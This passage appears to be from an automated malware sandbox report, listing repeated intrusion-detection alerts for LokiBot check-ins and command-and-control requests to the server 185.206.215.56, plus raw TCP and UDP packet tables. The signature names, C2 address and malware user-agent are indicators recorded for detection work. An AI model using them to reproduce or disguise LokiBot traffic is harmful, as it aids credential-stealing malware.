                                                                                        01/05/21-19:07:12.151046TCP2025381ET TROJAN LokiBot Checkin4933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.322356TCP2025483ET TROJAN LokiBot Fake 404 Response8049334185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.528628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2025381ET TROJAN LokiBot Checkin4933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.702702TCP2025483ET TROJAN LokiBot Fake 404 Response8049335185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.913605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2025381ET TROJAN LokiBot Checkin4933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.081152TCP2025483ET TROJAN LokiBot Fake 404 Response8049336185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:13.293357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2025381ET TROJAN LokiBot Checkin4933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.445018TCP2025483ET TROJAN LokiBot Fake 404 Response8049337185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:13.661854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2025381ET TROJAN LokiBot Checkin4933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.836048TCP2025483ET TROJAN LokiBot Fake 404 Response8049338185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.047995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2025381ET TROJAN LokiBot Checkin4933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.227580TCP2025483ET TROJAN LokiBot Fake 404 Response8049339185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.442937TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2025381ET TROJAN LokiBot Checkin4934080192.168.2.22185.206.215.56
01/05/21-19:07:14.442937 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49340 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:14.596332 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49340 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:14.806537 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49341 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:14.806537 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49341 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:14.806537 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49341 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:14.806537 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49341 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:14.974222 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49341 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:15.187360 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49342 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.187360 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49342 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.187360 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49342 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.187360 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49342 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.351310 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49342 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:15.557295 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49343 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.557295 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49343 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.557295 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49343 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.557295 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49343 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.731776 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49343 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:15.953688 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49344 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.953688 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49344 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.953688 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49344 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:15.953688 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49344 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.112186 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49344 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:16.321602 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49345 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.321602 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49345 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.321602 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49345 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.321602 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49345 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.490419 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49345 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:16.691140 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49346 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.691140 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49346 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.691140 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49346 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.691140 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49346 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:16.849536 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49346 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:17.070972 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49347 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.070972 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49347 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.070972 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49347 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.070972 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49347 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.241789 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49347 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:17.441718 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49348 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.441718 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49348 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.441718 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49348 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.441718 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49348 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.595691 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49348 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:17.814658 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49349 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.814658 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49349 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.814658 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49349 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.814658 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49349 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:17.974679 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49349 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:18.170246 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49350 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.170246 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49350 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.170246 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49350 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.170246 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49350 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.342973 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49350 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:18.546784 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49351 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.546784 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49351 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.546784 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49351 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.546784 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49351 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.726488 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49351 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:18.940629 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49352 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.940629 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49352 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.940629 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49352 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:18.940629 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49352 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.100818 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49352 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:19.314073 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49353 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.314073 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49353 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.314073 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49353 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.314073 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49353 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.472804 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49353 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:19.678882 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49354 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.678882 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49354 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.678882 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49354 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.678882 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49354 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:19.836989 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49354 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:20.060760 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49355 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.060760 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49355 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.060760 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49355 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.060760 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49355 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.222456 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49355 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:20.437125 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49356 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.437125 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49356 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.437125 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49356 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.437125 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49356 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.607773 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49356 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:20.817267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49357 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.817267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49357 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.817267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49357 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.817267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49357 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:20.984601 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49357 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:21.198560 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49358 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.198560 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49358 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.198560 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49358 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.198560 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49358 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.387078 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49358 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:21.572190 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49359 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.572190 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49359 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.572190 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49359 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.572190 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49359 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:21.741504 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49359 | 185.206.215.56 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2021 19:05:20.748044014 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:20.788083076 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:20.788252115 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:20.805231094 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:20.845263958 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:20.849673986 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:20.849720001 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:20.849750996 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:20.849864960 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:20.865313053 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:20.905706882 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:20.905836105 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:21.109913111 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:22.187321901 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:22.227421999 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:22.369307995 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:22.369350910 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
Jan 5, 2021 19:05:22.369590998 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
Jan 5, 2021 19:05:22.448667049 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.499711990 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.499824047 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.500040054 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.550899029 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551645994 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551749945 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551772118 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551798105 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551816940 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551848888 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551855087 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.551868916 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551882982 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.551893950 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551913023 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.551933050 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.551975965 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.602938890 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.602984905 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603022099 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603055954 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603085041 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.603097916 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603123903 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603127003 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.603161097 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603183031 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.603185892 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603223085 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603244066 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.603249073 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603286028 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603319883 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603353024 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.603360891 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603387117 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603424072 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603449106 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603452921 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.603483915 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603509903 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.603511095 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.605087996 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.654531002 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654580116 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654618979 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654643059 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654666901 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.654680014 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654695988 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.654706001 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654753923 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654783010 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654818058 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654833078 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.654844046 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654879093 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.654881001 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654906034 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654942036 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654966116 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.654969931 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.655011892 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655029058 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.655042887 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655078888 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655106068 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655142069 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655143976 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.655164957 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655200958 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655225992 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655226946 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.655272007 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655276060 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37
Jan 5, 2021 19:05:22.655301094 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655339956 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655359030 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655388117 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655412912 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22
Jan 5, 2021 19:05:22.655422926 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2021 19:05:20.671252966 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 5, 2021 19:05:20.727847099 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 5, 2021 19:05:21.293368101 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
